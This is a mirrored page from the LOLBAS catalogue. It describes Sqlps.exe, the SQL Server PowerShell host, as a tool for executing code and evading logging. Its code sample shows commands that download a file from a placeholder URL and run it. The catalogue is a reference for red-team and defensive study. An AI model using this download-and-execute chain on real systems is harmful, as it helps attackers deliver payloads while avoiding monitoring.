infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
LOLBAS/OtherMSBinaries/Sqlps.md

743 B
Raw Blame History

Sqlps.exe

  • Functions: Execute, evade logging
Sqlps.exe -noprofile

Acknowledgements:

  • Bryon - @bryon_

Code sample:

  • Downloading & executing a file
C:\Users>"C:\Program Files (x86)\Microsoft SQL Server\100\Tools\Binn\SQLPS.exe"
PS SQLSERVER> (New-Object net.webclient).downloadfile("http://<source file URL>","<local save path>")
PS SQLSERVER> ii <downloaded executable>
# ii is shorthand for Invoke-Item

Notes

  • Path above may vary slightly. If '100' is invalid, try replacing '100' with '110', this was required in a lab setup.

Resources:

Full path:

C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe

Notes: A Powershell host.